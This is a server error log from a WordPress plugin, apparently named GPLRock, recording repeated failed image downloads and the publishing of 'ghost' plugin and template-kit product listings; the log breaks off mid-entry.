Error: . Retrying... [05-Apr-2026 07:07:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helium-wordpress-full-screen-menu-32291.webp for product helium-wordpress-full-screen-menu after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:11 UTC] GPLRock: Image download failed for product helium-wordpress-full-screen-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:13 UTC] GPLRock: Image download failed for product helium-wordpress-full-screen-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helium-wordpress-full-screen-menu-32291.webp for product helium-wordpress-full-screen-menu after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:15 UTC] GPLRock WARNING: Image download failed for product helium-wordpress-full-screen-menu. URL: https://meldwp.com/wp-content/uploads/helium-wordpress-full-screen-menu-32291.webp [05-Apr-2026 07:07:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: helium-wordpress-full-screen-menu [05-Apr-2026 07:07:15 UTC] GPLRock: Image download failed for product card-slider-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:17 UTC] GPLRock: Image download failed for product card-slider-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/card-slider---addon-for-wpbakery-page-builder-8946.webp for product card-slider-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:19 UTC] GPLRock: Image download failed for product card-slider-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:22 UTC] GPLRock: Image download failed for product card-slider-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/card-slider---addon-for-wpbakery-page-builder-8946.webp for product card-slider-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:24 UTC] GPLRock WARNING: Image download failed for product card-slider-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/card-slider---addon-for-wpbakery-page-builder-8946.webp [05-Apr-2026 07:07:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: card-slider-addon-for-wpbakery-page-builder [05-Apr-2026 07:07:24 UTC] GPLRock: Image download failed for product graphina-forminator-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:26 UTC] GPLRock: Image download failed for product graphina-forminator-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/graphina---forminator-add-on-27936.webp for product graphina-forminator-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:28 UTC] GPLRock: Image download failed for product graphina-forminator-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:30 UTC] GPLRock: Image download failed for product graphina-forminator-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/graphina---forminator-add-on-27936.webp for product graphina-forminator-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:32 UTC] GPLRock WARNING: Image download failed for product graphina-forminator-add-on. URL: https://meldwp.com/wp-content/uploads/graphina---forminator-add-on-27936.webp [05-Apr-2026 07:07:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: graphina-forminator-add-on [05-Apr-2026 07:07:32 UTC] GPLRock: Image download failed for product woocommerce-email-order-instant-order-by-email (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:35 UTC] GPLRock: Image download failed for product woocommerce-email-order-instant-order-by-email (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-email-order---instant-order-by-email-1172.webp for product woocommerce-email-order-instant-order-by-email after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:37 UTC] GPLRock: Image download failed for product woocommerce-email-order-instant-order-by-email (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:39 UTC] GPLRock: Image download failed for product woocommerce-email-order-instant-order-by-email (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-email-order---instant-order-by-email-1172.webp for product woocommerce-email-order-instant-order-by-email after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:41 UTC] GPLRock WARNING: Image download failed for product woocommerce-email-order-instant-order-by-email. URL: https://meldwp.com/wp-content/uploads/woocommerce-email-order---instant-order-by-email-1172.webp [05-Apr-2026 07:07:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-email-order-instant-order-by-email [05-Apr-2026 07:07:41 UTC] GPLRock: Image download failed for product sharkha-share-counter-views-counts-voting-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:43 UTC] GPLRock: Image download failed for product sharkha-share-counter-views-counts-voting-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sharkha---share-counter-views-counts--voting-system-24947.webp for product sharkha-share-counter-views-counts-voting-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:45 UTC] GPLRock: Image download failed for product sharkha-share-counter-views-counts-voting-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:47 UTC] GPLRock: Image download failed for product sharkha-share-counter-views-counts-voting-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sharkha---share-counter-views-counts--voting-system-24947.webp for product sharkha-share-counter-views-counts-voting-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:50 UTC] GPLRock WARNING: Image download failed for product sharkha-share-counter-views-counts-voting-system. URL: https://meldwp.com/wp-content/uploads/sharkha---share-counter-views-counts--voting-system-24947.webp [05-Apr-2026 07:07:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sharkha-share-counter-views-counts-voting-system [05-Apr-2026 07:08:18 UTC] GPLRock: Image download failed for product yellowpencil-visual-css-style-editor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:20 UTC] GPLRock: Image download failed for product yellowpencil-visual-css-style-editor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yellowpencil---visual-css-style-editor-31493.webp for product yellowpencil-visual-css-style-editor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:08:22 UTC] GPLRock: Image download failed for product yellowpencil-visual-css-style-editor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:24 UTC] GPLRock: Image download failed for product yellowpencil-visual-css-style-editor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yellowpencil---visual-css-style-editor-31493.webp for product yellowpencil-visual-css-style-editor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:08:26 UTC] GPLRock WARNING: Image download failed for product yellowpencil-visual-css-style-editor. URL: https://meldwp.com/wp-content/uploads/yellowpencil---visual-css-style-editor-31493.webp [05-Apr-2026 07:08:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yellowpencil-visual-css-style-editor [05-Apr-2026 07:08:26 UTC] GPLRock: Image download failed for product viavi-flickr-album-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:28 UTC] GPLRock: Image download failed for product viavi-flickr-album-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/viavi-flickr-album-gallery-24323.webp for product viavi-flickr-album-gallery after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:08:30 UTC] GPLRock: Image download failed for product viavi-flickr-album-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:33 UTC] GPLRock: Image download failed for product viavi-flickr-album-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/viavi-flickr-album-gallery-24323.webp for product viavi-flickr-album-gallery after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:08:35 UTC] GPLRock WARNING: Image download failed for product viavi-flickr-album-gallery. URL: https://meldwp.com/wp-content/uploads/viavi-flickr-album-gallery-24323.webp [05-Apr-2026 07:08:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: viavi-flickr-album-gallery [05-Apr-2026 07:08:35 UTC] GPLRock: Image download failed for product woocommerce-sequential-order (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:37 UTC] GPLRock: Image download failed for product woocommerce-sequential-order (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-sequential-order-15180.webp for product woocommerce-sequential-order after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:08:39 UTC] GPLRock: Image download failed for product woocommerce-sequential-order (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:41 UTC] GPLRock: Image download failed for product woocommerce-sequential-order (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-sequential-order-15180.webp for product woocommerce-sequential-order after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:08:43 UTC] GPLRock WARNING: Image download failed for product woocommerce-sequential-order. URL: https://meldwp.com/wp-content/uploads/woocommerce-sequential-order-15180.webp [05-Apr-2026 07:08:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-sequential-order [05-Apr-2026 07:08:43 UTC] GPLRock: Image download failed for product woocommerce-product-condition-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:46 UTC] GPLRock: Image download failed for product woocommerce-product-condition-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-condition-plugin-28499.webp for product woocommerce-product-condition-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:08:48 UTC] GPLRock: Image download failed for product woocommerce-product-condition-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:50 UTC] GPLRock: Image download failed for product woocommerce-product-condition-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-condition-plugin-28499.webp for product woocommerce-product-condition-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:08:52 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-condition-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-condition-plugin-28499.webp [05-Apr-2026 07:08:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-condition-plugin [05-Apr-2026 07:08:52 UTC] GPLRock: Image downloaded successfully for product wp-custom-cursors-wordpress-cursor-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6d7803f.webp [05-Apr-2026 07:08:52 UTC] GPLRock: Using pre-downloaded image for product wp-custom-cursors-wordpress-cursor-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6d7803f.webp [05-Apr-2026 07:08:52 UTC] GPLRock: Ghost product published with image - Product ID: wp-custom-cursors-wordpress-cursor-plugin [05-Apr-2026 07:08:52 UTC] GPLRock: Image download failed for product automatic-video-creator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:54 UTC] GPLRock: Image download failed for product automatic-video-creator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/automatic-video-creator-plugin-for-wordpress-13437.webp for product automatic-video-creator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:08:57 UTC] GPLRock: Image download failed for product automatic-video-creator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:08:59 UTC] GPLRock: Image download failed for product automatic-video-creator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/automatic-video-creator-plugin-for-wordpress-13437.webp for product automatic-video-creator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:09:01 UTC] GPLRock WARNING: Image download failed for product automatic-video-creator-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/automatic-video-creator-plugin-for-wordpress-13437.webp [05-Apr-2026 07:09:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: automatic-video-creator-plugin-for-wordpress [05-Apr-2026 07:09:01 UTC] GPLRock: Image download failed for product fullscreen-parallax-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:03 UTC] GPLRock: Image download failed for product fullscreen-parallax-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fullscreen-parallax-wordpress-plugin-14588.webp for product fullscreen-parallax-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:09:05 UTC] GPLRock: Image download failed for product fullscreen-parallax-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:07 UTC] GPLRock: Image download failed for product fullscreen-parallax-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fullscreen-parallax-wordpress-plugin-14588.webp for product fullscreen-parallax-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:09:09 UTC] GPLRock WARNING: Image download failed for product fullscreen-parallax-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/fullscreen-parallax-wordpress-plugin-14588.webp [05-Apr-2026 07:09:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fullscreen-parallax-wordpress-plugin [05-Apr-2026 07:09:10 UTC] GPLRock: Image download failed for product wp-soundify-wordpress-audio-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:12 UTC] GPLRock: Image download failed for product wp-soundify-wordpress-audio-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-soundify--wordpress-audio-plugin-12727.webp for product wp-soundify-wordpress-audio-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:09:14 UTC] GPLRock: Image download failed for product wp-soundify-wordpress-audio-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:16 UTC] GPLRock: Image download failed for product wp-soundify-wordpress-audio-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-soundify--wordpress-audio-plugin-12727.webp for product wp-soundify-wordpress-audio-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:09:18 UTC] GPLRock WARNING: Image download failed for product wp-soundify-wordpress-audio-plugin. URL: https://meldwp.com/wp-content/uploads/wp-soundify--wordpress-audio-plugin-12727.webp [05-Apr-2026 07:09:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-soundify-wordpress-audio-plugin [05-Apr-2026 07:09:18 UTC] GPLRock: Image download failed for product social-timeline-wordpress-social-stream (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:20 UTC] GPLRock: Image download failed for product social-timeline-wordpress-social-stream (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-timeline---wordpress-social-stream-32961.webp for product social-timeline-wordpress-social-stream after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:09:23 UTC] GPLRock: Image download failed for product social-timeline-wordpress-social-stream (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:25 UTC] GPLRock: Image download failed for product social-timeline-wordpress-social-stream (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-timeline---wordpress-social-stream-32961.webp for product social-timeline-wordpress-social-stream after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:09:27 UTC] GPLRock WARNING: Image download failed for product social-timeline-wordpress-social-stream. URL: https://meldwp.com/wp-content/uploads/social-timeline---wordpress-social-stream-32961.webp [05-Apr-2026 07:09:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-timeline-wordpress-social-stream [05-Apr-2026 07:09:27 UTC] GPLRock: Image download failed for product paradise-slider-responsive-bootstrap-carousel-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:29 UTC] GPLRock: Image download failed for product paradise-slider-responsive-bootstrap-carousel-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paradise-slider---responsive-bootstrap-carousel-plugin-22047.webp for product paradise-slider-responsive-bootstrap-carousel-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:09:31 UTC] GPLRock: Image download failed for product paradise-slider-responsive-bootstrap-carousel-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:33 UTC] GPLRock: Image download failed for product paradise-slider-responsive-bootstrap-carousel-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:09:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paradise-slider---responsive-bootstrap-carousel-plugin-22047.webp for product paradise-slider-responsive-bootstrap-carousel-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:09:35 UTC] GPLRock WARNING: Image download failed for product paradise-slider-responsive-bootstrap-carousel-plugin. URL: https://meldwp.com/wp-content/uploads/paradise-slider---responsive-bootstrap-carousel-plugin-22047.webp [05-Apr-2026 07:09:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: paradise-slider-responsive-bootstrap-carousel-plugin [05-Apr-2026 07:10:17 UTC] GPLRock: Image downloaded successfully for product wp-simple-pay-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-058c8b34.jpg [05-Apr-2026 07:10:17 UTC] GPLRock: Using pre-downloaded image for product wp-simple-pay-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-058c8b34.jpg [05-Apr-2026 07:10:17 UTC] GPLRock: Ghost product published with image - Product ID: wp-simple-pay-pro [05-Apr-2026 07:10:18 UTC] GPLRock: Image downloaded successfully for product ait-stripe-payments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d27540ab.jpg [05-Apr-2026 07:10:18 UTC] GPLRock: Using pre-downloaded image for product ait-stripe-payments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d27540ab.jpg [05-Apr-2026 07:10:18 UTC] GPLRock: Ghost product published with image - Product ID: ait-stripe-payments [05-Apr-2026 07:10:20 UTC] GPLRock: Image downloaded successfully for product ait-special-offers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5d24e605.jpg [05-Apr-2026 07:10:20 UTC] GPLRock: Using pre-downloaded image for product ait-special-offers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5d24e605.jpg [05-Apr-2026 07:10:20 UTC] GPLRock: Ghost product published with image - Product ID: ait-special-offers [05-Apr-2026 07:10:21 UTC] GPLRock: Image downloaded successfully for product ait-permissions-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-910ceffd.jpg [05-Apr-2026 07:10:21 UTC] GPLRock: Using pre-downloaded image for product ait-permissions-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-910ceffd.jpg [05-Apr-2026 07:10:21 UTC] GPLRock: Ghost product published with image - Product ID: ait-permissions-manager [05-Apr-2026 07:10:23 UTC] GPLRock: Image downloaded successfully for product ait-paypal-subscriptions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6fa5a659.jpg [05-Apr-2026 07:10:23 UTC] GPLRock: Using pre-downloaded image for product ait-paypal-subscriptions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6fa5a659.jpg [05-Apr-2026 07:10:23 UTC] GPLRock: Ghost product published with image - Product ID: ait-paypal-subscriptions [05-Apr-2026 07:10:25 UTC] GPLRock: Image downloaded successfully for product ait-quick-comments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46a04488.jpg [05-Apr-2026 07:10:25 UTC] GPLRock: Using pre-downloaded image for product ait-quick-comments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46a04488.jpg [05-Apr-2026 07:10:25 UTC] GPLRock: Ghost product published with image - Product ID: ait-quick-comments [05-Apr-2026 07:10:26 UTC] GPLRock: Image downloaded successfully for product gravity-forms-paypal-payments-pro-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a5fd24ba.jpg [05-Apr-2026 07:10:26 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-paypal-payments-pro-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a5fd24ba.jpg [05-Apr-2026 07:10:26 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-paypal-payments-pro-addon [05-Apr-2026 07:10:28 UTC] GPLRock: Image downloaded successfully for product yith-easy-login-register-popup-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-adf094c9.jpg [05-Apr-2026 07:10:28 UTC] GPLRock: Using pre-downloaded image for product yith-easy-login-register-popup-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-adf094c9.jpg [05-Apr-2026 07:10:28 UTC] GPLRock: Ghost product published with image - Product ID: yith-easy-login-register-popup-for-woocommerce [05-Apr-2026 07:10:30 UTC] GPLRock: Image downloaded successfully for product yith-payment-method-restrictions-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c115c3d4.jpg [05-Apr-2026 07:10:30 UTC] GPLRock: Using pre-downloaded image for product yith-payment-method-restrictions-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c115c3d4.jpg [05-Apr-2026 07:10:30 UTC] GPLRock: Ghost product published with image - Product ID: yith-payment-method-restrictions-for-woocommerce-premium [05-Apr-2026 07:10:32 UTC] GPLRock: Image downloaded successfully for product yith-quick-order-forms-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eadb9a57.jpg [05-Apr-2026 07:10:32 UTC] GPLRock: Using pre-downloaded image for product yith-quick-order-forms-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eadb9a57.jpg [05-Apr-2026 07:10:32 UTC] GPLRock: Ghost product published with image - Product ID: yith-quick-order-forms-for-woocommerce-premium [05-Apr-2026 07:13:14 UTC] GPLRock: Image downloaded successfully for product heisberg-craft-beer-brewery-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b976a931.webp [05-Apr-2026 07:13:14 UTC] GPLRock: Using pre-downloaded image for product heisberg-craft-beer-brewery-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b976a931.webp [05-Apr-2026 07:13:14 UTC] GPLRock: Ghost product published with image - Product ID: heisberg-craft-beer-brewery-elementor-template-kit [05-Apr-2026 07:13:16 UTC] GPLRock: Image downloaded successfully for product hecxa-creative-design-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e3be361.webp [05-Apr-2026 07:13:16 UTC] GPLRock: Using pre-downloaded image for product hecxa-creative-design-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e3be361.webp [05-Apr-2026 07:13:16 UTC] GPLRock: Ghost product published with image - Product ID: hecxa-creative-design-agency-elementor-template-kit [05-Apr-2026 07:13:17 UTC] GPLRock: Image downloaded successfully for product hayka-hiking-camping-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c02c8f96.webp [05-Apr-2026 07:13:17 UTC] GPLRock: Using pre-downloaded image for product hayka-hiking-camping-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c02c8f96.webp [05-Apr-2026 07:13:17 UTC] GPLRock: Ghost product published with image - Product ID: hayka-hiking-camping-elementor-template-kit [05-Apr-2026 07:13:18 UTC] GPLRock: Image downloaded successfully for product hasto-cyber-tech-security-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5458226c.webp [05-Apr-2026 07:13:18 UTC] GPLRock: Using pre-downloaded image for product hasto-cyber-tech-security-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5458226c.webp [05-Apr-2026 07:13:18 UTC] GPLRock: Ghost product published with image - Product ID: hasto-cyber-tech-security-service-elementor-template-kit [05-Apr-2026 07:13:20 UTC] GPLRock: Image downloaded successfully for product hasseland-real-estate-listing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3368bacf.webp [05-Apr-2026 07:13:20 UTC] GPLRock: Using pre-downloaded image for product hasseland-real-estate-listing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3368bacf.webp [05-Apr-2026 07:13:20 UTC] GPLRock: Ghost product published with image - Product ID: hasseland-real-estate-listing-elementor-template-kit [05-Apr-2026 07:13:21 UTC] GPLRock: Image downloaded successfully for product gueni-business-solution-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d52db170.webp [05-Apr-2026 07:13:21 UTC] GPLRock: Using pre-downloaded image for product gueni-business-solution-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d52db170.webp [05-Apr-2026 07:13:21 UTC] GPLRock: Ghost product published with image - Product ID: gueni-business-solution-elementor-template-kit [05-Apr-2026 07:13:23 UTC] GPLRock: Image downloaded successfully for product grozpastry-bakery-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-577bd06d.webp [05-Apr-2026 07:13:23 UTC] GPLRock: Using pre-downloaded image for product grozpastry-bakery-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-577bd06d.webp [05-Apr-2026 07:13:23 UTC] GPLRock: Ghost product published with image - Product ID: grozpastry-bakery-elementor-template-kit [05-Apr-2026 07:13:24 UTC] GPLRock: Image downloaded successfully for product groxi-grocery-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-41eac488.webp [05-Apr-2026 07:13:24 UTC] GPLRock: Using pre-downloaded image for product groxi-grocery-store-elementor-template-kit: 